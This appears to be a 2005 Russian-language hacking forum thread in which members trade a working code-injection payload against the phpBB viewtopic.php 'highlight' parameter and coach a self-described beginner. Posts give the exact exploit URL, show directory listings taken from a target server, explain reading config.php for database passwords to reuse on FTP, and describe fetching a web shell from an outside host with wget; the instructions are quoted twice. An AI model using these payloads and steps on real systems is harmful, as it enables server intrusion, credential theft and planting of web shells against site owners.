
02.07.2005, 13:16
|
|
Новичок
Регистрация: 15.04.2005
Сообщений: 20
С нами:
11089592
Репутация:
0
|
|
И у меня, всё работает на ура!!!
|
|
|

08.07.2005, 04:57
|
|
Banned
Регистрация: 21.04.2005
Сообщений: 328
С нами:
11081186
Репутация:
9
|
|
Сообщение от WeKSTiK
И у меня, всё работает на ура!!!
Покажи пример твоего запроса...
Всмысле че ты в командной строке писал
|
|
|

02.07.2005, 17:04
|
|
Новичок
Регистрация: 01.07.2005
Сообщений: 13
С нами:
10979325
Репутация:
0
|
|
я ввожу "phpbb.pl 192.168.140.14 / 459 "ls -la"
форум пропачен до 2.0.15 причем криво, с хакера сплоит пробивает но он какой то странный. Это тоже канает (http://target/forum/viewtopic.php?t=243&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).')
кстати, как спомощью этого /\/\/\ грузануть файл на сервак?
Последний раз редактировалось S1on; 02.07.2005 в 17:13..
|
|
|

02.07.2005, 23:28
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,131
С нами:
11517446
Репутация:
2258
|
|
у меня тоже это сплойт работал только тогда когда он вышел в свет))) а щас все время файлед...
>>надо компилировать код пот названием r57phpbb2010.pl ?!
вы что не понимаете что ПЕРЛ СКРИПТЫ не компилят??
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|

02.07.2005, 23:54
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами:
11058146
Репутация:
4536
|
|
дык я думаю против такой баги даже самые ленивые админы обновляют форумы.
|
|
|

03.07.2005, 13:24
|
|
Новичок
Регистрация: 03.07.2005
Сообщений: 5
С нами:
10976018
Репутация:
0
|
|
&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'
Воспользовался вот этой темой...
admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php
Получил данное сообщение.
Обясните ламеру что делать дальше? Как получить пароли от форума и.т.п.?
|
|
|

03.07.2005, 13:39
|
|
Новичок
Регистрация: 03.07.2005
Сообщений: 5
С нами:
10976018
Репутация:
0
|
|
Пожалуйста помогите)) Введите в курс дела...объясните че за сплойт)) ПОжалуйста!
|
|
|

03.07.2005, 14:24
|
|
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
С нами:
11317286
Репутация:
3876
|
|
Dragunov, максимум что ты получишь - пароли от БД. =))
их получаешь из следующей команды:
viewtopic.php?t=123[вместо 123 подставляешь свой номер топика]&cmd=cat%20config.php&highlight='.passthru($HTTP_G ET_VARS[cmd]).'
Запустил? Ничего не появилось?  ) Правильно)). Далее просмотри html-сорс странички и ты наткнёшься там на примерно это:
<?php
$dbms = 'mysql';
$dbhost = 'localhost';
$dbname = '*********';
$dbuser = '*******';
$dbpasswd = '*****';
$table_prefix = 'phpbb_';
define('PHPBB_INSTALLED', true);
?>
Вместо звёздочек, понятное дело, будут данные.. вот их и юзай. попробуй для ФТП попробовать логин и пароль.
для заливки шелла юзаем команду wget. Синаксис:
wget http://shell.narod.ru/shell.php
Пишем это дело в cmd в урле.
Даливайте шелл только в ту папку, куда позволяют права. Чтобы узнать какие права в папочке, юзайте команду ls -la.
cmd=ls -la;wget http:// ....
вот приблизительно так должно получиться)).
Переходить в др. директории командой cd.
зы: можно писать несколько команд через точку с запятой.
|
|
|

06.07.2005, 03:03
|
|
Новичок
Регистрация: 10.06.2005
Сообщений: 2
С нами:
11009879
Репутация:
0
|
|
Сообщение от Rebz
Dragunov, максимум что ты получишь - пароли от БД. =))
их получаешь из следующей команды:
viewtopic.php?t=123[вместо 123 подставляешь свой номер топика]&cmd=cat%20config.php&highlight='.passthru($HTTP_G ET_VARS[cmd]).'
Запустил? Ничего не появилось?  ) Правильно)). Далее просмотри html-сорс странички и ты наткнёшься там на примерно это:
<?php
$dbms = 'mysql';
$dbhost = 'localhost';
$dbname = '*********';
$dbuser = '*******';
$dbpasswd = '*****';
$table_prefix = 'phpbb_';
define('PHPBB_INSTALLED', true);
?>
Вместо звёздочек, понятное дело, будут данные.. вот их и юзай. попробуй для ФТП попробовать логин и пароль.
для заливки шелла юзаем команду wget. Синаксис:
wget http://shell.narod.ru/shell.php
Пишем это дело в cmd в урле.
Даливайте шелл только в ту папку, куда позволяют права. Чтобы узнать какие права в папочке, юзайте команду ls -la.
cmd=ls -la;wget http:// ....
вот приблизительно так должно получиться)).
Переходить в др. директории командой cd.
зы: можно писать несколько команд через точку с запятой.
Привет, у меня немного по-другому исчезает само сообщение на странице т.е там где текст ничего нету, но в сорсе кода тоже ничего не отображает, в чем может быть дело ?
|
|
|

03.07.2005, 14:36
|
|
Новичок
Регистрация: 03.07.2005
Сообщений: 5
С нами:
10976018
Репутация:
0
|
|
Я грю)) Я конкретный ламер) ЧТо такое шелл?
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|